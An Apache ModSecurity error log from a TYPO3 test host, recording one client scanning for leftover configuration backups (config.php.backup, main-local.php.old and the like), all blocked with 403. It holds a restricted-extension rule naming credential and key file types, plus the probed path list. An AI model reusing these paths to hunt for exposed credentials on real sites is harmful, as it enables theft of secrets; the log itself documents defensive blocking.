[Fri Apr 05 03:01:45.801214 2024] [:error] [pid 2272634] [client 91.215.85.29:52036] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config/config.php.backup"] [unique_id "Zg9NeUpp3m0IkOTL-p_qKAAAAAI"]
[Fri Apr 05 03:01:45.801629 2024] [:error] [pid 2272634] [client 91.215.85.29:52036] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/config.php.backup"] [unique_id "Zg9NeUpp3m0IkOTL-p_qKAAAAAI"]
[Fri Apr 05 03:01:45.801787 2024] [:error] [pid 2272634] [client 91.215.85.29:52036] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/config.php.backup"] [unique_id "Zg9NeUpp3m0IkOTL-p_qKAAAAAI"]
[Fri Apr 05 03:01:45.846942 2024] [authz_core:error] [pid 2272636] [client 91.215.85.29:52148] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.inc.php.dist
[Fri Apr 05 03:01:45.856922 2024] [:error] [pid 2272633] [client 91.215.85.29:52152] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config.inc.php.old"] [unique_id "Zg9NefUzfkmOvnEGQl8h_wAAAAE"]
[Fri Apr 05 03:01:45.857313 2024] [:error] [pid 2272633] [client 91.215.85.29:52152] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config.inc.php.old"] [unique_id "Zg9NefUzfkmOvnEGQl8h_wAAAAE"]
[Fri Apr 05 03:01:45.857471 2024] [:error] [pid 2272633] [client 91.215.85.29:52152] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config.inc.php.old"] [unique_id "Zg9NefUzfkmOvnEGQl8h_wAAAAE"]
[Fri Apr 05 03:01:45.880487 2024] [authz_core:error] [pid 2272635] [client 91.215.85.29:52124] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.inc.php.bak
[Fri Apr 05 03:01:45.904754 2024] [:error] [pid 2272634] [client 91.215.85.29:52126] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/config.inc.php.backup"] [unique_id "Zg9NeUpp3m0IkOTL-p_qKQAAAAI"]
[Fri Apr 05 03:01:45.905125 2024] [:error] [pid 2272634] [client 91.215.85.29:52126] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config.inc.php.backup"] [unique_id "Zg9NeUpp3m0IkOTL-p_qKQAAAAI"]
[Fri Apr 05 03:01:45.905289 2024] [:error] [pid 2272634] [client 91.215.85.29:52126] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config.inc.php.backup"] [unique_id "Zg9NeUpp3m0IkOTL-p_qKQAAAAI"]
[Fri Apr 05 03:01:45.937009 2024] [:error] [pid 2273014] [client 91.215.85.29:52156] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/conn.php.backup"] [unique_id "Zg9NedqZi0hNKs0Q6mN6cAAAAAY"]
[Fri Apr 05 03:01:45.937541 2024] [:error] [pid 2273014] [client 91.215.85.29:52156] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/conn.php.backup"] [unique_id "Zg9NedqZi0hNKs0Q6mN6cAAAAAY"]
[Fri Apr 05 03:01:45.937783 2024] [:error] [pid 2273014] [client 91.215.85.29:52156] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/conn.php.backup"] [unique_id "Zg9NedqZi0hNKs0Q6mN6cAAAAAY"]
[Fri Apr 05 03:01:45.983281 2024] [:error] [pid 2272635] [client 91.215.85.29:52464] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/e/class/config.php.backup"] [unique_id "Zg9NeWi0jWz5YPncRIL-9AAAAAM"]
[Fri Apr 05 03:01:45.983665 2024] [:error] [pid 2272635] [client 91.215.85.29:52464] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/e/class/config.php.backup"] [unique_id "Zg9NeWi0jWz5YPncRIL-9AAAAAM"]
[Fri Apr 05 03:01:45.983867 2024] [:error] [pid 2272635] [client 91.215.85.29:52464] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/e/class/config.php.backup"] [unique_id "Zg9NeWi0jWz5YPncRIL-9AAAAAM"]
[Fri Apr 05 03:01:46.007533 2024] [authz_core:error] [pid 2272634] [client 91.215.85.29:52474] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/data
[Fri Apr 05 03:01:46.094247 2024] [authz_core:error] [pid 2272633] [client 91.215.85.29:52502] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/e
[Fri Apr 05 03:01:46.107181 2024] [authz_core:error] [pid 2272634] [client 91.215.85.29:52594] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/e
[Fri Apr 05 03:01:46.156395 2024] [authz_core:error] [pid 2273014] [client 91.215.85.29:52610] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/e
[Fri Apr 05 03:01:46.221404 2024] [:error] [pid 2272636] [client 91.215.85.29:52662] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/environments/dev/common/config/main-local.php.old"] [unique_id "Zg9Neu7eMoB0OR9e06enqwAAAAQ"]
[Fri Apr 05 03:01:46.221692 2024] [:error] [pid 2272635] [client 91.215.85.29:52642] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/environments/dev/common/config/main-local.php.backup"] [unique_id "Zg9Nemi0jWz5YPncRIL-9gAAAAM"]
[Fri Apr 05 03:01:46.221773 2024] [:error] [pid 2272636] [client 91.215.85.29:52662] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/environments/dev/common/config/main-local.php.old"] [unique_id "Zg9Neu7eMoB0OR9e06enqwAAAAQ"]
[Fri Apr 05 03:01:46.221937 2024] [:error] [pid 2272636] [client 91.215.85.29:52662] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/environments/dev/common/config/main-local.php.old"] [unique_id "Zg9Neu7eMoB0OR9e06enqwAAAAQ"]
[Fri Apr 05 03:01:46.222045 2024] [:error] [pid 2272635] [client 91.215.85.29:52642] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/environments/dev/common/config/main-local.php.backup"] [unique_id "Zg9Nemi0jWz5YPncRIL-9gAAAAM"]
[Fri Apr 05 03:01:46.222203 2024] [:error] [pid 2272635] [client 91.215.85.29:52642] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/environments/dev/common/config/main-local.php.backup"] [unique_id "Zg9Nemi0jWz5YPncRIL-9gAAAAM"]
[Fri Apr 05 03:01:46.229223 2024] [:error] [pid 2272632] [client 91.215.85.29:52706] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/environments/prod/common/config/main-local.php.backup"] [unique_id "Zg9Nehd3u0Yvuu6g37bWfgAAAAA"]
[Fri Apr 05 03:01:46.229766 2024] [:error] [pid 2272632] [client 91.215.85.29:52706] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/environments/prod/common/config/main-local.php.backup"] [unique_id "Zg9Nehd3u0Yvuu6g37bWfgAAAAA"]
[Fri Apr 05 03:01:46.230503 2024] [:error] [pid 2272632] [client 91.215.85.29:52706] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/environments/prod/common/config/main-local.php.backup"] [unique_id "Zg9Nehd3u0Yvuu6g37bWfgAAAAA"]
[Fri Apr 05 03:01:46.329880 2024] [:error] [pid 2272635] [client 91.215.85.29:52790] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/include/config.inc.php.backup"] [unique_id "Zg9Nemi0jWz5YPncRIL-9wAAAAM"]
[Fri Apr 05 03:01:46.330306 2024] [:error] [pid 2272635] [client 91.215.85.29:52790] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/include/config.inc.php.backup"] [unique_id "Zg9Nemi0jWz5YPncRIL-9wAAAAM"]
[Fri Apr 05 03:01:46.330480 2024] [:error] [pid 2272635] [client 91.215.85.29:52790] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/include/config.inc.php.backup"] [unique_id "Zg9Nemi0jWz5YPncRIL-9wAAAAM"]
[Fri Apr 05 03:01:46.334737 2024] [authz_core:error] [pid 2272632] [client 91.215.85.29:52808] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/include
[Fri Apr 05 03:01:46.429029 2024] [:error] [pid 2272635] [client 91.215.85.29:52880] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/installation/configuration.php.old"] [unique_id "Zg9Nemi0jWz5YPncRIL--AAAAAM"]
[Fri Apr 05 03:01:46.429948 2024] [:error] [pid 2272635] [client 91.215.85.29:52880] [client 91.215.85.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/installation/configuration.php.old"] [unique_id "Zg9Nemi0jWz5YPncRIL--AAAAAM"]
[Fri Apr 05 03:01:46.430324 2024] [:error] [pid 2272635] [client 91.215.85.29:52880] [client 91.215.85.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/installation/configuration.php.old"] [unique_id "Zg9Nemi0jWz5YPncRIL--AAAAAM"]
[Fri Apr 05 03:01:46.460604 2024] [:error] [pid 2272636] [client 91.215.85.29:52918] [client 91.215.85.29] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/phpsso_server/caches/configs/system.php.backup"] [unique_id "Zg9Neu7eMoB0OR9e06enrQAAAAQ"]
